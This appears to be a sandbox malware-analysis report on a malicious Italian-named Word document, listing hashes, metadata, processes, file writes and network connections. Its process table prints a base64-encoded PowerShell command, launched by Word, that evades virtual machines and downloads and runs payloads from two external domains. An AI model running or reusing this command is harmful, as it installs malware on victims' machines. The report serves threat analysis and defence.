File name: | Notificazione-67513.doc |
Full analysis: | https://app.any.run/tasks/ad194484-8e77-40d4-aad3-afe3f9b9eadd |
Verdict: | Malicious activity |
Analysis date: | September 11, 2019, 11:20:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 8, Name of Creating Application: Microsoft Office Word, Total Editing Time: 10:00, Create Time/Date: Mon Jul 22 14:22:00 2019, Last Saved Time/Date: Thu Sep 5 05:50:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 47EE257F3B0714A7B1386F831730B534 |
SHA1: | 060BD9E2B4FC94DF51B77EDB10452CA66635CD49 |
SHA256: | ED2E3871CECE73802F9DC907049E3E0559AA170B4E8AE6F2AF38ADAB5A80FAA8 |
SSDEEP: | 1536:+xqR4Wg4s0zd59HwQno36m/6ZrwcY1SkuQo+a9HZTmXBgnUSD97:+8RpvsS9HwQuSrdYwQJ6nUy7 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:09:05 04:50:00 |
CreateDate: | 2019:07:22 13:22:00 |
TotalEditTime: | 10.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 8 |
LastModifiedBy: | Administrator |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Administrator |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2600 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Notificazione-67513.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.5123.5000 | ||||
2764 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'O2lmKCgoR2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZIikgLW9yICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE1vZGVsKS5Nb2RlbCAtbWF0Y2ggIlZpcnR1YWxCb3h8Vk13YXJlfEtWTXxIVk0iKSl7ZXhpdDt9OyRhPUpvaW4tUGF0aCAkZW52OlB1YmxpYyAiXExpYnJhcmllc1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmpzIjskYj1Kb2luLVBhdGggJGVudjp0ZW1wICJNaWNyb3M2NC5leGUiO3RyeXsoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygiaHR0cDovL3dlYi5zcGVha2luZ29maG9tZS5jb20vP3BhZ2U9cmluZyZ2aWQ9cGl0NCZkamUiKXxvdXQtZmlsZSAkYTtTdGFydC1Qcm9jZXNzICRhO31jYXRjaHt9O3RyeXsoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly9wcm8ucHJvc3Blcml0eWJvb2trZWVwaW5nLm5ldC9sYXN0dXBkYXRlLnppcD90Z2l3dCIsJGIpOyBTdGFydC1Qcm9jZXNzICRiO31jYXRjaHt9Ozs=' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2600 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7E80.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2764 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XN6L2UV9C6ZYRAU75N14.temp | — | |
MD5:— | SHA256:— | |||
2600 | WINWORD.EXE | C:\Users\admin\Desktop\~$tificazione-67513.doc | pgc | |
MD5:5377DAE4BFB058175B0D01DC76B49127 | SHA256:50A2F6983A95F5C513E8B201C73DE76764F3C17B2FB9548C1CC036BB72F92DE5 | |||
2600 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:298CB3B616E96A9490CD0172511C56C5 | SHA256:DDE8FE87FF6E131C8B5DE4C0790A3D210888555F6B0F0E83207333C2CF8149F4 | |||
2764 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:4C55FB736B5823D4C1F277BE226111D3 | SHA256:A7471F464E931AAD365E5A751019F5F21931417F3DCD221ADC662ED7215EEE5B | |||
2764 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF159842.TMP | binary | |
MD5:4C55FB736B5823D4C1F277BE226111D3 | SHA256:A7471F464E931AAD365E5A751019F5F21931417F3DCD221ADC662ED7215EEE5B | |||
2600 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Notificazione-67513.doc.LNK | lnk | |
MD5:83DAFBB01A1E57EECA49F3A7816DA843 | SHA256:6D708619677869E1B922A254787BF23E0523012BDFDF097BD83678C3DAB18D01 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2764 | powershell.exe | GET | — | 31.214.157.4:80 | http://web.speakingofhome.com/?page=ring&vid=pit4&dje | NL | — | — | malicious |
2764 | powershell.exe | GET | — | 185.189.151.24:80 | http://pro.prosperitybookkeeping.net/lastupdate.zip?tgiwt | CH | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2764 | powershell.exe | 31.214.157.4:80 | web.speakingofhome.com | easystores GmbH | NL | malicious |
— | — | 185.189.151.24:80 | pro.prosperitybookkeeping.net | SOFTplus Entwicklungen GmbH | CH | suspicious |
Domain | IP | Reputation |
---|---|---|
web.speakingofhome.com |
| unknown |
pro.prosperitybookkeeping.net |
| suspicious |